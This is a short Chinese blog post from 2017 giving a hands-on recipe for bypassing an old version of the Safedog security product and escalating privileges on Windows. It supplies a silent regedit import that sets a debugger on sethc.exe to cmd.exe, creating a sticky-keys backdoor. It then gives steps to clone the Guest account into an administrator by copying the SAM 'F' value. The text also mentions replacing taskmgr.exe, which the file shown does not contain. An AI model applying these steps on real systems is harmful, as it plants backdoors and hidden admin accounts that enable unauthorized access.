低版本安全狗绕过提权实战

执行reg文件实现shift提权

"regedit /s c:\11.reg"

 

11.reg内容:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"debugger"="c:\\windows\\system32\\cmd.exe"

 

 

11.reg 文件里 taskmgr.exe  可以替换成cmd.exe或者lusrmgr.msc [本地用户组管理]
通过lusrmgr.msc新建立一个帐号 如果不能新建帐号 则可以通过修改Guest用户的密码然后通过注册表进行对Guest用户的克隆  克隆方法如下
在任务管理器 输入regedit 或regedt32 打开注册表 寻找HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Administrator
打开右侧的F值 将内容复制Guest对应的000001F5
打开右侧的F值 将内容粘贴到值中保存 就把Guest克隆成管理员权限了

posted @ 2017-05-08 17:02  小生观察室  阅读(322)  评论(0编辑  收藏  举报